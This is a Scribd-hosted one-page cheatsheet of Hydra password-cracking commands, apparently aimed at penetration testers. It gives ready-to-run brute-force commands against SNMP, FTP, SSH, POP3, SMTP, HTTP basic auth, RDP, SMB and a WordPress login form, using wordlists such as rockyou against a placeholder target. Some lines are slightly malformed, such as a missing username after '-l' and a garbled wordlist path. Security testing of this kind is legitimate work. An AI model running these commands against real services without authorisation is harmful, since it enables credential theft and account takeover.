Scribd
Upload
154 views1 page

Hydra Password Cracking Cheatsheet: Command Description

The document is a cheatsheet for using Hydra, a password cracking tool, with various commands for brute-forcing different services such as SNMP, FTP, SSH, POP3, SMTP, HTTP, RDP, and SMB. It provides specific command syntax including options for user and password lists, as well as targeting specific ports and protocols. Each command is accompanied by a brief description of its purpose, making it a quick reference guide for penetration testing and security assessments.

Uploaded by

John Wick
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
154 views1 page

Hydra Password Cracking Cheatsheet: Command Description

The document is a cheatsheet for using Hydra, a password cracking tool, with various commands for brute-forcing different services such as SNMP, FTP, SSH, POP3, SMTP, HTTP, RDP, and SMB. It provides specific command syntax including options for user and password lists, as well as targeting specific ports and protocols. Each command is accompanied by a brief description of its purpose, making it a quick reference guide for penetration testing and security assessments.

Uploaded by

John Wick
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

Hydra Password Cracking Cheatsheet

Command Description

Hydra brute force against


hydra -P password-file.txt -v $ip snmp
SNMP

Hydra FTP known user and


hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp
rockyou password list

Hydra SSH using list of users


hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh
and passwords

Hydra SSH using a known


hydra -v -V -u -L users.txt -p "" -t 1 -u $ip ssh
password and a username list

Hydra SSH Against Known


hydra $ip -s 22 ssh -l -P big_wordlist.txt
username on port 22

hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V Hydra POP3 Brute Force

hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V Hydra SMTP Brute Force

Hydra attack http get 401


hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin
login with a dictionary

Hydra attack Windows


hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip
Remote Desktop with rockyou

Hydra brute force SMB user


hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb
with rockyou:

hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp- Hydra brute force a


login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' Wordpress admin login

You might also like